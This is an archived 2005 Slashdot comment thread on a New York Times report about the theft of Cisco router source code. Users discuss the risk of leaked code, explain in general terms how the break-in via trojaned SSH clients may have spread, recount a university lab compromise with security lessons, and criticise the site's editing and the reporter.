Follow Slashdot stories on Twitter

 


Forgot your password?
Close
typodupeerror
×
Security IT

More on Last Year's Cisco Source Code Theft 266

Posted by CmdrTaco from the worst-of-both-worlds dept.
grazzy writes "The New York Times has a story about last year's theft of Cisco source code: The incident seemed alarming enough: a breach of a Cisco Systems network in which an intruder seized programming instructions for many of the computers that control the flow of the Internet. "
This discussion has been archived. No new comments can be posted.

More on Last Year's Cisco Source Code Theft More

More on Last Year's Cisco Source Code Theft

Comments Filter:

  • Did they steal the editor too? (Score:3, Funny)

    by P3NIS_CLEAVER ( 860022 ) on Tuesday May 10, 2005 @11:03AM (#12488583) Journal
    What's a Thef????

  • Stakkato (Score:3, Interesting)

    by natron 2.0 ( 615149 ) <`moc.liamg' `ta' `97sretepdn'> on Tuesday May 10, 2005 @11:03AM (#12488593) Homepage Journal

    so now the hunt is on for the elusive stakkato...

  • cmdr taco (Score:4, Funny)

    by mondoterrifico ( 317567 ) on Tuesday May 10, 2005 @11:03AM (#12488596) Journal
    Master of the ebonics.

  • But on 24 they said cisco networks were (Score:4, Funny)

    by Anonymous Coward on Tuesday May 10, 2005 @11:05AM (#12488615)
    self defending?????

  • Question for an expert... (Score:5, Interesting)

    by wcitech ( 798381 ) on Tuesday May 10, 2005 @11:06AM (#12488619)
    I'm without a doubt no networking expert, so I'd like to ask one of you who is: if the source code for cisco's equipment is leaked, would that person have the ability to create some kind of virus/malware that could bring the internet to a screaching halt? What can they do, infect routers with viruses now? I guess I'm unclear on the real dangers in a situation like this.

    • Re:Question for an expert... (Score:5, Funny)

      by CaymanIslandCarpedie ( 868408 ) on Tuesday May 10, 2005 @11:10AM (#12488661) Journal
      No, that just makes it more secure sense more eyes will be looking at it ;-)

    • Re:Question for an expert... (Score:5, Insightful)

      by Phil246 ( 803464 ) on Tuesday May 10, 2005 @11:11AM (#12488676)
      only if there are flaws in said code.
      • whoever modded this a troll - turn in your badge of geekhood. Flawless sourcecode is useless when it comes to trying to use it to do damage. Only if there are flaws IN the code, will it be possible to damage routers by exploiting it.
        • While I'm agreed with the general statement, I'm not sure it's of any real value. Where is this flawless source code? Based on recent experiences with Cisco code, Cisco certainly doesn't have it. I don't meant to single out Cisco. Look at the history of openssh, and I think the OpenBSD folks write high-quality, security-conscious code.
    • No, likely not.

      1) Cisco IOS does not run the *whole* Internet. Different IOS versions apply as well.

      2) Revealed source code != massive untapped exploits.

      3) IOS doesn't have an execution environment with "open" interfaces like a desktop OS. Routers don't execute transport data or routing data. This means no script kiddies. There are of course other ways to crash a router.

      4) IOS is mature and (obviously) well tested. People have been throwing all sorts of strange things as Cisco routers for a long ti
      • 3) IOS doesn't have an execution environment with "open" interfaces like a desktop OS. Routers don't execute transport data or routing data. This means no script kiddies. There are of course other ways to crash a router.

        I kinda wonder about this sometimes. As a for instance, here [cisco.com] is an excellent example of how to write an SMTP client in the TCL shell included in recent IOS versions. Of course, getting the shell to start out with is left as an exercise to the reader, but routers operate more and more he

      • 1) Cisco IOS does not run the *whole* Internet. Different IOS versions apply as well.

        It runs enough of the backbones to cause very serious problems if it is compromised.

        2) Revealed source code != massive untapped exploits.

        I wouldn't want to count on that. It's possible that their code is perfect, but....

        3) IOS doesn't have an execution environment with "open" interfaces like a desktop OS. Routers don't execute transport data or routing data. This means no script kiddies. There are of course ot

    • Even with the leaked source code, you'd have to be quite skilled progammer to find flaws which you could exploit in there.
      The strength(and flaws) of internet become from the versatile equipment used in creating it. Most operators have their own device setup they're familiar with.
      Not everything runs with cisco, though they would probably want it that way.(ca-ching)

      The hardware in question isn't your average linux/bsd router, so you can't just whip up exploit with x86 compiler and push it in.
      Since the system

  • Missing (Score:2, Redundant)

    by nizo ( 81281 ) *
    One slightly used t. Reward if found.

  • Comment removed (Score:3, Funny)

    by account_deleted ( 4530225 ) on Tuesday May 10, 2005 @11:07AM (#12488634)
    Comment removed based on user account deletion

  • Doesn't make sense (Score:4, Interesting)

    by afidel ( 530433 ) on Tuesday May 10, 2005 @11:08AM (#12488636)
    Cisco uses two factor one time passwords for remote access. I don't see how planting a trojaned copy of SSH on the lab computers would give the hacker access to Cisco's systems.

    • Re:Doesn't make sense (Score:3, Interesting)

      by dr_dank ( 472072 )
      From the tone of the article, it seems that a keylogger was used to grab passwords from a cisco user, which were then used from machines in that lab remotely exploited by an ssh rootkit.

      • Re:Doesn't make sense (Score:3, Interesting)

        by afidel ( 530433 )
        Yes, but if things were working as they should have been a password logger doesn't do you ANY good. The password as entered by the user consists of two parts, the first part is their passphrase, which is like a traditional password, but the second part is a numeric sequence which is spat out by a numeric FOB which is synced to the master access server. These combined passwords must be entered within a narrow window, and once accepted are no longer valid. Someone must have f'd up big time to allow an interne

        • Re:Doesn't make sense (Score:3, Interesting)

          by dr_dank ( 472072 )
          Its not easy to pull off, but if you can enter the sequence before it expires, you can gain entry. IIRC, for the RSA SecurIDs, its 90 seconds.
          • That's an understatement. I read the original description of the timing security flaw, and it was far from practical to exploit. Let's just say that you needed a real-time key logger on your target user, and the ability to type _very_ fast just to get started. I'm not aware of the weakness ever being exploited, and it was fixed prior to 2000.

            Meanwhile, people are still coming up with amusing weaknesses! Here's one that merely requires stealing the user's token for a week without their knowledge, and having

          • Re:Doesn't make sense (Score:3, Insightful)

            by afidel ( 530433 )
            Nope, once it is used that sequence is removed from the valid pool. This is to insure against replay attacks just as you describe. I've done it to myself before where I hit disconnect on accident and was unable to relogin until the next number came up on the fob.

    • Re:Doesn't make sense (Score:5, Interesting)

      by rcw-home ( 122017 ) on Tuesday May 10, 2005 @12:01PM (#12489232)
      Cisco uses two factor one time passwords for remote access. I don't see how planting a trojaned copy of SSH on the lab computers would give the hacker access to Cisco's systems.

      I don't know how Cisco has their stuff set up, but it's easy to imagine such a breach playing out:

      1. Black hat replaces ssh client at University lab computer.
      2. Authorized but unwitting user uses University computer to VPN into Cisco's network and then uses the trojaned ssh client to connect to a computer on Cisco's network.
      3. The trojaned ssh client is now able to execute arbitrary code as the unwitting user on an internal Cisco computer. It uploads an executable to the internal Cisco computer that regularly makes outgoing TCP connections (they could even look like web browser traffic) to a computer under the black hat's control. The black hat sends control commands through these connections which the executable gladly obeys.
      4. The black hat is now free to scan the internal network to look for a host they can get root on, or hope that the user's account on the internal server they control will be used to connect to other internal systems, perhaps using more highly privileged accounts. (Any admins ever had to sit down at a users' computer and ssh into a server to fix something?) The longer the initial breakin is left unidentified, the better the chances of this occurring.
      5. Eventually the black hat will strike paydirt and get root on a system. From then on, the rootkit that the black hat installs can use any credentials anyone uses to access any systems remotely. Ssh into something? It can run commands on the remote host. Connect to a file server? It can replace executables that you have write access to and wait for someone else to run them.

      While an attacker would need a fairly deep understanding of the software infrastructure he is attacking and of the usage habits of the users there to pull this off, the same basic strategy is applicable to UNIX, Windows, anything. I remember reading several years ago that the breakins at Exodus and VA Linux happened this way.

      We're only used to the stuff we hear about not doing any real damage, because it's all dumb worms running without anyone at the controls. Just because we can fend off that stuff doesn't mean that someone with determination, knowledge, and patience won't get in and stay in.

  • Timing.. (Score:5, Interesting)

    by gmerideth ( 107286 ) <gmerideth&uclnj,com> on Tuesday May 10, 2005 @11:08AM (#12488637) Homepage
    Rather good timing that last night on "24" we see Cisco's name all over the screen's at the CTU command center and the actress works in the line "the Cisco network is defending itself" followed immediately by an Alienware laptop on the screen.

    Just in time for major articles about how bad Cisco's security was that they had some source code stolen. /golfclap foxtv

    And people wonder why I don't watch television. Sad..just sad.

    • Re:Timing.. (Score:3, Insightful)

      by Anonymous Coward
      If you dont watch TV how did you see that?

    • Re:Timing.. (Score:5, Funny)

      by gad_zuki! ( 70830 ) on Tuesday May 10, 2005 @12:26PM (#12489436)
      >And people wonder why I don't watch television.

      So this vision of 24 came to you in a fever dream then?

    • Re:Timing.. (Score:2, Insightful)

      by JTek ( 5392 )
      Last night on "24"...And people wonder why I don't watch television. Sad..just sad.

      Obviously, you do watch television.
    • I got stuck watching "CSI: Miami" with the in-laws. I've never seen "24", but it can't be more inaccurate than "Miami": "Hey, we've got a X-ray machine's serial number - let's just type it into the Bat Crime Computer to see who bought it."

      My wife kept looking at me to watch my reaction to the on-screen stupidity and eventually said that she'd never actually heard anyone roll their eyes before.

  • This definetly goes to show that www.hackiis6.com's 18yr old rule was probably imposed to simply limit the number of hackers who will enter. Props to the kid for pulling this off... even if he did get into trouble =).

  • Alarming ? (Score:5, Insightful)

    by alexhs ( 877055 ) on Tuesday May 10, 2005 @11:10AM (#12488656) Homepage Journal
    The incident seemed alarming enough

    Why alarming ? The internet is still up and running since that last years theft.

    (I guess it should be read last year's)

    Sensationnal breaking news !
    The programming instructions of Linux and Free/Net/OpenBSD, which run many of big corporations servers, is avalaible to the sight of anybody! That's alarming!

    • Re:Alarming ? (Score:3, Interesting)

      by iztaru ( 832035 )
      I think the problem with this could come from two corners: 1- The people at Cisco are not as confident with their source code as the people of Linux, Free/Net/OpenBSD 2- There are back doors in the Cisco systems for the government to use and they are afraid anyone else might find them useful!
    • programming instructions

      Programming instructions? In the popular press (at least in Sweden), stolen source code is referred to as source codes and in such a way that it sounds like stolen passwords.

  • Wren Montgomery (Score:3, Insightful)

    by kevin_conaway ( 585204 ) on Tuesday May 10, 2005 @11:10AM (#12488658) Homepage
    So let me get this straight. This lady knew that someone had breached her system and she a.) kept right on using it and b.) taunted the person who had breached her system? What was she thinking? If your machine has been compromised, pull the plug and clean it!

  • Contradiction? (Score:5, Insightful)

    by simon2263 ( 799241 ) on Tuesday May 10, 2005 @11:12AM (#12488682)
    On one hand, the article claims that "With such information, sophisticated intruders would potentially be able to compromise security on router computers of Cisco customers running the affected programs" and on the other hand that Cisco itself claims that "the improper publication of this information does not create increased risk to customers' networks". These statements are, IMHO, in direct contradiction of each other. Who the hell should we believe?

    • As odd as it sounds, both are correct. A sophisticated intruder could compromise security with the stolen code. Or not.

      But for the sake of argument, suppose they do find flaws in Cisco's code. An exploit shows up on rootkit.org or someplace. It should be apparent from the exploit which flaws they're using, and so Cisco cleans up the flaw. In the long run, customers are actually safer.

      It's sort of a backasswards way to open source your code.

  • Thef (Score:4, Interesting)

    by Doc Ruby ( 173196 ) on Tuesday May 10, 2005 @11:14AM (#12488701) Homepage Journal
    What do Slashdot "authors" (editors) do all day? They publish about 35 stories in a 24 hour cycle, usually about 4 editors participating. That's about 1-2 stories an hour, with 1-2 authors overlapping shifts. The summaries take about 2 minutes max to read, and the stories take max 5-10 minutes. That seems ample time to catch dups, fix typos, spelling and punctuation errors. Why not? What else are they doing? Maybe they don't read Slashdot after they've published, so they don't see all the feedback on their poor editing performance.

    • Re:Thef (Score:5, Funny)

      by gowen ( 141411 ) <gwowen@gmail.com> on Tuesday May 10, 2005 @11:27AM (#12488846) Homepage Journal
      What else are they doing?
      Applying massive amounts of negative mod-points to posts criticising Slashdot Editors... See you at (-1 Troll), baby).

    • Re:Thef (Score:5, Interesting)

      by Doc Ruby ( 173196 ) on Tuesday May 10, 2005 @12:06PM (#12489278) Homepage Journal
      Moderation 0
      50% Interesting
      20% Troll
      20% Redundant

      Where's another post running a time analysis of Slashdot editing? Even given Slashdot's absence of features to prevent comment redundancy, isn't a chorus of "not again!" appropriate? And how is my coherent, accurate comment, which I haven't seen before, a "Troll"?

      Perhaps this comment is just the criticism uberpost, destined to point out all the serious flaws in Slashdot's publishing system model. If so, here's some constructive suggestions for fixing it:

      1. Submitted story queue filter: editors see a story, with links listed separately (already a Slashcode function). Links already published in a previous story are indicated, linked to the previously published story. Publishing such links includes an "ongoing coverage" indication in the new published story.

      2. Submission spell/grammar checker

      3. Submission link checker: links in stories in submission queue are interlinked through a Slashdot redirection script which sets a flag. Until each link's flag has been set, by following the link (through the script) to the linked object, the story cannot be published.

      4. Mod comments: Negative moderation must be accompanied by an explanatory comment, which can be viewed by metamoderators. Metamoderation gets more "teeth", with 3 "unfair" metamods cutting modpoints for a month, and 3 such suspensions cutting modpoints forever.

    • They use Windows. (C'mon, where do you think all the Windows trolls here come from and why are all Windows trolls modded up?)

      And haven't figured out how to use the spellchecker since it's on a menu, not an icon (on the desktop.)

  • I get the very uneasy feeling... (Score:5, Insightful)

    by kclittle ( 625128 ) on Tuesday May 10, 2005 @11:16AM (#12488716)
    ...that all the discovered breaches are by inept, pimply-faced teens (regardless of how many times some news article quotes some 'expert' about how 'particularly clever' the idiot was), and that the really serious harm is being done by real pros who never leave a trace.
    Scary...
    • ...the one you see running across your living room is the stupid one that isn't doing any damage and will probably win (or lose!) the Darwin award by stepping into a trap.

      It's the SMART mice eating the food in your cupboard and breeding in the walls that you don't see you have to be concerned with.

      The same comments apply to serial killers. The dumb ones get caught, the smart ones are scary.
      • Heh, heh, let me tell about one stupid blind mouse...

        In a former living quarters (too disgusting to describe), I'm laying on my bed and I look over and see this mouse come out a hole in the wall next to my bed, ignore me, walk down the wall, turn the corner into the bathroom.

        "Okay, smart ass, I got your ignore right here!", says I.

        I take out a glue trap, put it right at the corner to the bathroom.

        Sure enough, five minutes later, El Stupido comes waltzing around the corner following his nose whiskers as
    • inept, pimply-faced teens

      Careful now - let's not invite JonKatz back into the picture...

  • Seriously, what's the problem? (Score:5, Insightful)

    by daniel_mcl ( 77919 ) on Tuesday May 10, 2005 @11:17AM (#12488726)
    As a good number of regular slashdot readers are no doubt aware, full source code to Linux, Apache, etc. is available to anyone and they are more secure than their counterparts for this reason. If access to the source code for Cisco routers makes it possible to write a whole bunch of backbone-targeting virii that would really drop my opinion of Cisco routers considerably.

    If you actually read the article, the exploit was not big deal either; some guy just distributed a trojan'd SSH client to a bunch of people and collected their passwords and then ran a bunch of rootkits. Nothing to see here.
    • Right, but the difference is that the maintainers for Linux, Apache, et all *know* the source is available. If a hole is discovered, it has to be fixed as anyone with the source may have already discovered it and might be prepping a 0 day exploit.

      Cisco doesn't have to worry in the same way as no one else can see their code. There's less incentive to fix known potential holes and less incentive for Cisco to search the code for potential exploits.

      Except....

      So, yes. I'd be very surprised if Cisco routers

  • Cisco VPN Client (Score:2, Interesting)

    by Malc ( 1751 )
    Tell me again why our IT department insists on using this buggy Cisco VPN Client POS that causes me grief on a daily basis...
    • Gotta love the Cisco VPN client. Version 4(think that's one) doesn't work at all on Windows 2k(at least to me). Falling back to version 3 has less-than-stellar performance.

      I remember using version 4 on WinXP and hitting connect instantly rebooted my system.

      Great joerb!

  • Catastrophic apostrophic (Score:4, Informative)

    by Ancient_Hacker ( 751168 ) on Tuesday May 10, 2005 @11:26AM (#12488827)
    "last years theft" : A theft, in the last years of Cisco "last year's theft": A theft, in the previous year. Apostrophes do make a difference.

  • This is actually kinda funny (Score:5, Interesting)

    by Jetifi ( 188285 ) on Tuesday May 10, 2005 @11:29AM (#12488871) Homepage
    I mean, 'cybersecurity' bigheads are all worried about Terrorists disabling our Internet Infostructure etc., but in real life it turns out that any vulnerabilities that could be used to break into (e.g.) the JPL, White Sands, the DoD etc. have already been exploited by petulant teenagers.

    So in this sense, the script kiddies of the Internet are kinda like an early warning system: it's almost certain that before someone with serious intentions finds a nasty flaw and uses it, it'll be discovered by some kid who will promptly boast about it on IRC.

    How lucky we are that terrorists find themselves vastly outnumbered by people with too much free time on their hands!

  • More Source Code stolen for Routers (Score:2, Funny)

    by Anonymous Coward
    In other news, the source code for a different router/firewall technology was posted on the net: http://www.openbsd.org/cgi-bin/cvsweb/ [openbsd.org]

  • not just Cisco! (Score:5, Funny)

    by Heisenbug ( 122836 ) on Tuesday May 10, 2005 @11:35AM (#12488941)
    a breach of a Cisco Systems network in which an intruder seized programming instructions for many of the computers that control the flow of the Internet.

    Just wait until these guys see apache.org ...

  • John Markoff (Score:5, Informative)

    by wackysootroom ( 243310 ) on Tuesday May 10, 2005 @11:37AM (#12488953) Homepage
    Note that this article was written by the person famous for creating the myth of Kevin Mitnick being a super hacker. Markoff is largely responsible for the fear and paranoia surrounding Mitnick and consequently his unfair prison experience.

    His articles were full of lies and exaggerations back then so I would take this article with a grain of salt as well.
    • thank you so much for pointing this out, the articale seemed very fuzzy, now i know why.
    • Note that this article was written by the person famous for creating the myth of Kevin Mitnick being a super hacker. Markoff is largely responsible for the fear and paranoia surrounding Mitnick and consequently his unfair prison experience.

      Kevin, we have a deadline, and you don't have time to be playing on /. Get back to work.

      -- your boss

  • If the code in its entirety is leaked to a real self-respecting hacker, he ought to port the thing to x86 systems, possibly building a network driver interface to linux's network drivers. Before you know it, there are dell machines routing packets using IOS 12.4.

    Hopefully that will motivate someone to build an IOS clone on an OpenBSD or NetBSD subsystem for multiple architectures...

    mmmmmmmm IOS source code *drool*

    • Since IOS seems to consist of a brain-damaged circa-1965 UNIX clone with a command-line only a router engineer could love, I'd say it shouldn't be too difficult to implement it after taking a one-semester course in BASIC...

      Their machines are basically 33MHz 486's with 8 or 16 MB of RAM, some interface chips and some ASICS.

      If it wasn't for the ASIC chips, Cisco would have been out of business years ago.

  • I wouldn't believe everything in this story. (Score:3, Interesting)

    by Anonymous Coward on Tuesday May 10, 2005 @11:46AM (#12489054)
    Note that this article is by John Markoff, who has established a history of trying to milk arrests of people for his own personal profit, by not only sensationalizing security breeches, but assisting authorities to the point of being on site during the arrests, and doing book and movie deals afterwards.

    Don't confuse this story with independent journalism; Markoff is out to make a mint here, however he can.

    Markoff reportedly was pissed of at Kevin Mitnick for spurning a movie deal, and later set himself up to write "the Kevin Mitnick story", earning over a million dollars in the process.

    Here's a link: http://www.labmistress.com/kevins_story.php [labmistress.com]

    So one really has to wonder what the Truth is here, and whether Markoff is just trying to screw over some teenage kid in Europe in order to make another million off of it.

    So I'd take anything that John Markoff has to say with a LARGE grain of salt. The same goes for the New York Times, which has officially encouraged this practice.

    The real truth is probably out there; but I wouldn't expect to hear it from either John Markoff or the NY Times.

  • We got hit. (Score:5, Interesting)

    by glockenspieler ( 692846 ) on Tuesday May 10, 2005 @11:48AM (#12489068)
    My laboratory was hit. We're all linux machines. Turns out that I still had an account on a system at Stanford where I was faculty and I transferred some files via scp to my machine at my current university. 4-5 days later, i see some logins from Stanford to my machine but I because I had been using the Stanford account recently, it just didn't register.

    One day later, I'm on another lab machine using my lab /home directory (different from my main machine) and i notice a program (it was either brk.c or dobrk.c I think) that was on an unpatched system, allowed a priviledge escalation. I switch to root and look at the history and see a command to stop recording the command history but he (and the article indicates the person is male) misstypied it so i could see that he logged into this machine from mine, grabbed the source code for the exploit from a warez site, compiled, ran, got root, and just tooled around a little.

    Because our machines are pretty isolated and don't have any hint of financial stuff, he seemed to just drop it. I called the sysadmin at Stanford, turned out that on a machine with over 500 accounts (i won't say which department), the machine had been rooted about 2 months prior and every password was being captured during that time. The breakin was tracked back through a couple of departments, then back to University of Michigan, then to Uppsala.

    Three valuable and perhaps obvious lessons here. Local priviledge escalation exploits are important even if your system has very few users. Keep your system patched (duh...), and remember, if you log onto your machine from another, ask yourself "What do I know about the integrity of this machine?". I really assumed that my stanford account was pretty secure and so I didn't even think about logging from that machine to my current one. No more.

    The other interesting thing was that the local exploit used on my machines was announced well after the Stanford machine was hit. I don't think I ever heard of how that machine was comprimised.

    • Re:We got hit. (Score:5, Informative)

      by s.d. ( 33767 ) on Tuesday May 10, 2005 @12:19PM (#12489384)

      it was probably dobrk, that was one of the vulnerabilities the attacker(s) used last year to root systems.

      see http://xforce.iss.net/xforce/xfdb/13880 [iss.net] (this was the 1st google link i saw, there are probably others with better information but i'm lazy).

    • Turns out that I still had an account on a system at Stanford where I was faculty and I transferred some files via scp to my machine at my current university.

      ...

      Remember, if you log onto your machine from another, ask yourself "What do I know about the integrity of this machine?". I really assumed that my stanford account was pretty secure and so I didn't even think about logging from that machine to my current one.

      The key principle is that security is not inherently symmetrical between an

    • Re:We got hit. (Score:4, Insightful)

      by natet ( 158905 ) on Tuesday May 10, 2005 @01:40PM (#12490301)
      One other thing you should be aware of: Pull, don't push, data. In other words, don't log into a remote system and then use scp to send the data back to your system. That exposes your password on your local system to the remote system. Instead, use one shell window to find what you want to get, then open a separate shell window on your system to pull the data from the remote system, or use any one of the many graphical SCP clients to log in, navigate around, and pull data back down.

      I have seen several incidents where the former pattern was used and it resulted in a compromise of the users password. The lab where I work has gone to 2 factor authentication to make exploiting this pattern more difficult, but with session hijacking, it is nearly impossible to eliminate.

      I also want to point something out to those that have been critisizing Cisco's network security. The failure wasn't on the Cisco side of things. The actual security breach happened on a network 1 or more hops away from the Cisco network. As far as Cisco was concerned, a legitimate network transaction was happening. Someone with valid credentials logged on to the system, and until they do something out of the ordinary (install a root kit, scan the network, etc...) they are virtually undetectable, as they don't differ from normal valid network usage.
  • is this "More On Some Topic", or "Some Topic for Morons"? Looks to me like someone just submitted a mainstream news article which dumbs everything down and pisses off slashdotters in the process.
  • In other news, there are reports of books on "CCNA Certification" which tell hackers how to take control Cisco's internal router software.

Slashdot Top Deals

"No matter where you go, there you are..." -- Buckaroo Banzai

Close